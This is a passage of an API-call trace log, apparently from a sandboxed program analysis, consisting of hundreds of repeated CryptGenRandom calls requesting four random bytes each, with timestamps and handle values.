pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.898] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.899] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.903] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.914] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.923] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.923] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.924] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.925] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 